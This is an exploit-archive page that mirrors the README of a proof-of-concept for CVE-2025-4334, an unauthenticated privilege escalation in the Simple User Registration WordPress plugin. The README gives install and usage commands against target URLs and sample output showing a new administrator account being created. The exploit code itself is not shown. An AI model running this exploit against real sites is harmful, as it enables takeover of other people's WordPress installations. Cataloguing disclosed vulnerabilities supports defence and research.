Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-4334 PoC — Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation

Source
https://github.com/0xgh057r3c0n/CVE-2025-4334
Associated Vulnerability
Title:Simple User Registration <= 6.3 - Unauthenticated Privilege Escalation (CVE-2025-4334)
Description:The Simple User Registration plugin for WordPress is vulnerable to Privilege Escalation in all versions up to, and including, 6.3. This is due to insufficient restrictions on user meta values that can be supplied during registration. This makes it possible for unauthenticated attackers to register as an administrator.
Description
Proof-of-concept exploit for CVE-2025-4334, a privilege escalation vulnerability in the Simple User Registration WordPress plugin (<= 6.3), allowing unauthenticated attackers to create administrator accounts.
Readme
<p align="center">
  <img src="https://s.w.org/style/images/about/WordPress-logotype-wmark.png" alt="WordPress Logo" width="150"/>
</p>

# CVE-2025-4334 - Simple User Registration <= 6.3 Unauthenticated Privilege Escalation

**Exploit Title:** Simple User Registration <= 6.3 – Unauthenticated Privilege Escalation  
**Author:** Gaurav Bhattacharjee (0xgh057r3c0n)  
**CVE ID:** CVE-2025-4334  

This exploit targets a vulnerability in the **Simple User Registration plugin for WordPress (<= v6.3)**, allowing **unauthenticated attackers** to escalate privileges and create a new administrator account.

---

## ⚙️ Installation

Clone the repository and install the required Python dependencies:

```bash
git clone https://github.com/0xgh057r3c0n/CVE-2025-4334.git
cd CVE-2025-4334
pip3 install -r requirements.txt
````

Dependencies:

* `requests`
* `colorama`

---

## 🚀 Usage

```bash
python3 CVE-2025-4334.py -u <base_url> --form <form_url>
```

**Arguments:**

* `-u / --url` → Base WordPress URL (e.g. `https://target.com/wordpress/`)
* `--form` → Full URL of the registration form (e.g. `https://target.com/wpr/default-registration/`)

**Example:**

```bash
python3 CVE-2025-4334.py -u https://example.com/wordpress --form https://example.com/wpr/default-registration/
```

---

## 📜 Sample Output

```
[*] Fetching form details...
[i] Extracted Nonce   : 1a2b3c4d5e
[i] Extracted Form ID : 12
[i] Referer Path      : /wpr/default-registration/
[*] Sending exploit payload...
[i] HTTP Response Code : 200
[i] Server Response    : {"success":true,"user_id":2}

[+] Exploitation Successful
[+] Username   : 0xgh057r3c0nadmin
[+] First Name : 0xgh057r3c0nadmin
[+] Last Name  : 0xgh057r3c0nadmin
[+] Email      : test@admin.com
[+] Password   : Wiz007@8876@
[+] Role       : administrator

Exploit By : Gaurav Bhattacharjee (0xgh057r3c0n)
```

---

## ⚠️ Disclaimer

This tool is provided for **educational and research purposes only**.
Unauthorized use against systems without permission is illegal.
The author takes **no responsibility** for misuse.

---

## 📄 License

This project is licensed under the [MIT License](LICENSE).
File Snapshot

 [4.0K]  /data/pocs/b11415ed6a265da7f4eff601d4a2e834d83a78a9
├── [4.9K]  CVE-2025-4334.py
├── [2.8K]  CVE-2025-4334.yaml
├── [1.1K]  LICENSE
├── [2.1K]  README.md
└── [  18]  requirements.txt

0 directories, 5 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →